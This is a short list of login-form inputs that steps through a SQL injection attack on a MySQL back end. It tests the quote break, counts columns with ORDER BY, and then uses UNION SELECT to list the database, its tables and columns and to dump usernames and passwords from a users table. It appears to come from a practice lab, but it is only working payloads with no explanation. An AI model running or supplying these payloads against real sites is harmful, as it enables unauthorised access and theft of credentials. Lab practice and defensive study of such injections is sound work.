User Name:qPassword:q
User Name:admin'#Password:1
User Name:admin'Password:1
User Name:admin' and '1'='1#Password:1
User Name:admin' and '1'='1Password:1
User Name:admin'#Password:1
User Name:admin' order by 1#Password:1
User Name:admin' order by 2#Password:1
User Name:admin' order by 3#Password:1
User Name:admin' and 1=2 union select 1,2#Password:1
User Name:admin' and 1=2 union select 1,database()#Password:1
User Name:admin' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#Password:1
User Name:admin' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#Password:1
User Name:admin' and 1=2 union select 1,concat_ws(',',id,username,password) from security.users limit 0,1#Password:1
User Name:admin' and 1=2 union select 1,concat_ws(',',id,username,password) from security.users limit 1,1#Password:1
User Name:admin' and 1=2 union select 1,concat_ws(',',id,username,password) from security.users limit 2,1#Password:1
User Name:adminPassword:admin
